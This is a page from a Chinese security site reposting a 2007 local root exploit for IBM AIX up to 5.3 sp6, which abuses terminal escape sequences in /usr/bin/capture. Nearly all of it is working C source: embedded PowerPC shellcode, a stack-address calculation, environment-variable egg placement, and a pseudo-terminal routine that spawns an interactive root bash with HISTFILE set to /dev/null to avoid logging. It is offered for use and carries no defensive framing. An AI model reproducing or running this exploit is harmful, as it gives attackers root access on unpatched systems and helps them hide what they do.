首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
IBM AIX <= 5.3 sp6 capture Terminal Sequence Local Root Exploit
来源:www.vfocus.net 作者:qaaz 发布时间:2007-07-27  
/* 07/2007: public release
*
* qaaz@aix:~$ ./aix-capture
* --------------------------------
*  AIX capture Local Root Exploit
*  By qaaz
* --------------------------------
* bash: no job control in this shell
* bash-3.00#
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#include <fcntl.h>
#include <unistd.h>
#include <sys/wait.h>
#include <sys/select.h>

#define TARGET "/usr/bin/capture"
#define VALCNT 40

#define MAX(x,y) ((x) > (y) ? (x) : (y))
#define ALIGN(x, y) (((x) + (y) - 1) / (y) * (y))

unsigned char qaazcode[] =
"\x60\x60\x60\x60\x60\x60\x60\x60"
"\x7c\x63\x1a\x79\x40\x82\xff\xfd"
"\x7e\xa8\x02\xa6\x3a\xb5\x01\x01"
"\x88\x55\xff\x5b\x3a\xd5\xff\x1b"
"\x7e\xc8\x03\xa6\x4c\xc6\x33\x42"
"\x44\xff\xff\x02\x38\x75\xff\x5f"
"\x38\x63\x01\x01\x88\x95\xff\x5d"
"\x38\x63\x01\x02\x38\x63\xfe\xff"
"\x88\xa3\xfe\xff\x7c\x04\x28\x40"
"\x40\x82\xff\xf0\x7c\xa5\x2a\x78"
"\x98\xa3\xfe\xff\x88\x55\xff\x5c"
"\x38\x75\xff\x5f\x38\x81\xff\xf8"
"\x90\x61\xff\xf8\x90\xa1\xff\xfc"
"\x4b\xff\xff\xbd\xb8\x05\x7c\xff";

void shell(int p1[2], int p2[2])
{
ssize_t n;
fd_set rset;
char buf[4096];

for (;;) {
FD_ZERO(&rset);
FD_SET(p1[0], &rset);
FD_SET(p2[0], &rset);

n = select(MAX(p1[0], p2[0]) + 1,
           &rset, NULL, NULL, NULL);
if (n < 0) {
perror("[-] select");
break;
}

if (FD_ISSET(p1[0], &rset)) {
n = read(p1[0], buf, sizeof(buf));
if (n <= 0) break;
write(p1[1], buf, n);
}
if (FD_ISSET(p2[0], &rset)) {
n = read(p2[0], buf, sizeof(buf));
if (n <= 0) break;
write(p2[1], buf, n);
}
}
}

/* just because you don't understand it doesn't mean it has to be wrong */
ulong get_addr(char *argv[], char *envp[], char *args[], char *envs[])
{
ulong top, len, off;
int i;

len = 0;
for (i = 0; argv[i]; i++)
len += strlen(argv[i]) + 1;
for (i = 0; envp[i]; i++)
len += strlen(envp[i]) + 1;
top = (ulong) argv[0] + ALIGN(len, 8);

len = off = 0;
for (i = 0; args[i]; i++)
len += strlen(args[i]) + 1;
for (i = 0; envs[i]; i++) {
if (!strncmp(envs[i], "EGG=", 4))
off = len + 4;
len += strlen(envs[i]) + 1;
}
while (off & 3)
strcat(envs[0], "X"), off++, len++;

return top - ALIGN(len, 4) + off;
}

int main(int argc, char *argv[], char *envp[])
{
char pad[16] = "PAD=X", egg[512], bsh[128], buf[1024];
char *args[] = { TARGET, "/dev/null", NULL };
char *envs[] = { pad, bsh, egg, NULL };
int ptm, pts, pi[2];
pid_t child;

sprintf(egg, "EGG=%s/proc/%d/object/a.out|", qaazcode, getpid());
sprintf(bsh, "SHELL=/proc/%d/object/a.out", getpid());

if (!envp[0]) {
dup2(3, 0);

setuid(geteuid());
putenv("HISTFILE=/dev/null");
execl("/bin/bash", "bash", "-i", NULL);
execl("/bin/sh", "sh", "-i", NULL);
perror("[-] execl");
exit(1);
} else if (argc && !strcmp(argv[0], "bsh")) {
char i, ch;
ulong addr = get_addr(argv, envp, args, envs);

printf("\x1b[");
for (i = 0; i < VALCNT; i++)
printf("%lu;", addr);
printf("0A\n");
fflush(stdout);

while (read(0, &ch, 1) == 1)
write(1, &ch, 1);
exit(0);
}

printf("--------------------------------\n");
printf(" AIX capture Local Root Exploit\n");
printf(" By qaaz\n");
printf("--------------------------------\n");

if (pipe(pi) < 0) {
perror("[-] pipe");
exit(1);
}

if ((ptm = open("/dev/ptc", O_RDWR)) < 0 ||
    (pts = open(ttyname(ptm), O_RDWR)) < 0) {
perror("[-] pty");
exit(1);
}

if ((child = fork()) < 0) {
perror("[-] fork");
exit(1);
}

if (child == 0) {
dup2(pts, 0);
dup2(pts, 1);
dup2(pts, 2);

dup2(pi[0], 3);

execve(TARGET, args, envs);
perror("[-] execve");
exit(1);
}

close(pi[0]);
close(pts);

sleep(1);
read(ptm, buf, sizeof(buf));

write(ptm, " ", 1);
shell((int[2]) { 0, pi[1] }, (int[2]) { ptm, 1 });
kill(child, SIGTERM);
waitpid(child, NULL, 0);
return 0;
}

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Nessus Vulnerability Scanner 3
·IBM AIX <= 5.3 sp6 pioout Arbi
·CrystalPlayer 1.98 Playlist Cr
·IBM AIX <= 5.3 sp6 ftp gets()
·IPSwitch IMail Server 2006 9.1
·PHP 5.x (win32service) Local S
·PHP php_gd2.dll imagepsloadfon
·Nessus Vulnerability Scanner 3
·Clever Internet ActiveX Suite
·SimpleBlog 3.0 (comments_get.a
·IPSwitch IMail Server 2006 SEA
·LinPHA <= 1.3.1 (new_images.ph
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved